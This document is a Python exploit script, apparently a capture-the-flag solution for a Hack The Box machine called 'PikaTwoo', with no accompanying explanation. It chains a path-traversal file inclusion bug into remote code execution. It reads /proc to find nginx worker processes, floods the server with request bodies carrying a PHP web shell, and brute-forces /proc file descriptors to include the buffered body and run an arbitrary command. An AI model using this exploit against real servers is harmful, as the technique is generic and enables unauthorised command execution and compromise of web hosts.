PikaTwoo

exploi.py

#!/usr/bin/env python3
import sys, threading, requests

URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
cookie = {'SESSA0': 'a'}

# find nginx worker processes
r  = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
cpus = r.text.count('processor')

r  = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/sys/kernel/pid_max'}, cookies=cookie)
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r  = requests.post(URL, data={'debug':1,'region':f'../../../../../proc/{pid}/cmdline'}, cookies=cookie)

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.post(URL, data='<?php system($_POST["c"]); /*' + 16*1024*'A', cookies=cookie)

for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid, cmd):
    global done

    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(32,10,-1):
            f = f'../../../../../proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
            r  = requests.post(URL, data={'debug':1, 'region':f'{f}', 'c': cmd}, cookies=cookie)
            if r.text:
                if 'unknown region' not in r.text:
                    print(f'[!] {f}: {r.text}')
                    done=True
                    exit()

cmd = sys.argv[1]
for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, cmd, ))
    a.start()

a.join()